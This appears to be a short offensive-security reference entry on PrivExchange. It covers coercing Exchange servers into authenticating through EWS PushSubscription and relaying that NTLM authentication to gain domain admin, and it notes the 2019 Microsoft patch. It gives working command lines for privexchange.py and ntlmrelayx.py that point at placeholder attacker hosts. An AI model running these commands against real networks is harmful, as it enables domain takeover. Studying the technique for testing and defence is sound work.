"PushSubscription" is an API on Exchange Web Services that allows to subscribe to push notifications. Attackers abuse it to make Exchange servers authenticate to a target of their choosing. The coerced authentication is made over HTTP, which is particularly powerful when doing NTLM relay (because of the Session Signing and MIC mitigations). As Exchange servers usually have high privileges in a domain (i.e.
WriteDacl, see Abusing ACLs), the forced authentication can then be relayed and abused to obtain domain admin privileges (see NTLM Relay and Kerberos Unconstrained Delegations).
privexchange.py -d $DOMAIN -u '$DOMAIN_USER' -p '$PASSWORD' -ah $ATTACKER_IP $EXCHANGE_SERVER_TARGET
mv httpattack.py httpattack.py.old
sed -i 's/attacker_url = .*$/attacker_url = "$ATTACKER_URL"/' httpattack.py
pip3 install .
ntlmrelayx.py -t https://exchange.server.EWS/Exchange.asmx
On February 12th 2019, Microsoft released updates for Exchange which resolved
- the coerced authentication issue
- the fact that Exchange servers had overkill permissions leading attacker to a full domain compromission.